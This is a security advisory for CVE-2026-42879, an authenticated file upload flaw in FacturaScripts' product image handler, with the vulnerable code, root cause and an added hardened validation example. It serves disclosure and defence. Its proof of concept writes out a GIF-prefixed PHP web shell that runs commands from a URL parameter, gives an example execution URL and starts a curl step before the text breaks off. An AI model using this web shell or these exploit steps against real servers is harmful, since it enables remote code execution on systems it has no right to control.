CVE-2026-42879 - FacturaScripts Vulnerable to Authenticated Remote Code Execution (RCE) via GIF I
GHSA-vf3q-frmr-vrr9 MEDIUM composer/facturascripts/facturascripts
CVE: CVE-2026-42879
CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass
Summary
An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.
Details
The vulnerability exists in:
Core/Lib/ExtendedController/ProductImagesTrait.php
Specifically in the addImageAction() method.
Vulnerable Code
// Only a substring match on the sniffed MIME type: a file that begins with the
// GIF89a magic bytes is reported as image/gif and passes this check.
if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}
$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
// The file is moved into the web-accessible folder using the client-supplied
// original filename, so a .php extension is kept as-is.
$uploadFile->move($folder, $uploadFile->getClientOriginalName());
Root Cause
- The validation only checks whether the MIME type contains "image/". This can be bypassed by prepending GIF89a magic bytes to a PHP file.
- The system incorrectly identifies the file as image/gif.
- The file is saved with a .php extension in a web-accessible directory.
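A hardened version of the check, added here as an example and not taken from FacturaScripts: it allowlists extensions, requires an exact MIME match for the extension, decodes the file with GD and re-encodes it under a server-generated name. It assumes PHP 8 with the GD extension; the function, its parameters and ALLOWED_IMAGE_TYPES are hypothetical names.

```php
<?php
// Added example, not FacturaScripts code: content-based validation plus
// re-encoding for an image upload, closing the gap described in this advisory.
// Assumes PHP 8 with GD; $tmpPath, $clientName, $destDir are hypothetical parameters.

// Exact MIME type expected for each allowed extension; no substring matching.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Stores the upload under a server-generated name and returns that name,
 * or null if the upload is rejected. The client-supplied name is never reused.
 */
function storeImageUpload(string $tmpPath, string $clientName, string $destDir): ?string
{
    // 1. Extension allowlist: "shell.jpg.php" ends in "php" and is rejected
    //    here, whatever the file contains.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return null;
    }

    // 2. The sniffed MIME type must equal the value expected for that extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext]) {
        return null;
    }

    // 3. Decode with GD. "GIF89a" followed by PHP source is not a decodable
    //    image, so it fails here; a genuine image decodes.
    $img = @imagecreatefromstring((string) file_get_contents($tmpPath));
    if ($img === false) {
        return null;
    }

    // 4. Re-encode into a fresh file under a random name. Re-encoding keeps
    //    only pixel data, so anything appended after the image is dropped.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($destDir, '/') . '/' . $name;
    $ok = match ($ext) {
        'jpg', 'jpeg' => imagejpeg($img, $dest, 90),
        'png'         => imagepng($img, $dest),
        'gif'         => imagegif($img, $dest),
    };
    imagedestroy($img);
    return $ok ? $name : null;
}
```

Because the stored name is generated server-side and carries only an allowlisted image extension, even a genuine image that still had PHP source appended is stored as .gif/.jpg/.png and is never handed to the PHP interpreter.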
File Storage Behavior
Uploaded files are stored in:
/MyFiles/YYYY/MM/X.php
Where X is an auto-incrementing ID. This allows direct remote execution:
http://target/MyFiles/2026/03/2.php?cmd=id
Impact
Successful exploitation:
An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.
Proof of Concept (Manual)
Step 1: Create malicious file
cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF
Step 2: Authenticate
- Login to the application
- Extract PHPSESSID from browser cookies
Step 3: Get CSRF token
curl -s "http://target/EditProducto?code=CONTA621" \
-H "Cookie: PHPSE
📌 Source: GitHub-Advisory | 🆔 CVE-2026-42879 | 📅 2026-05-07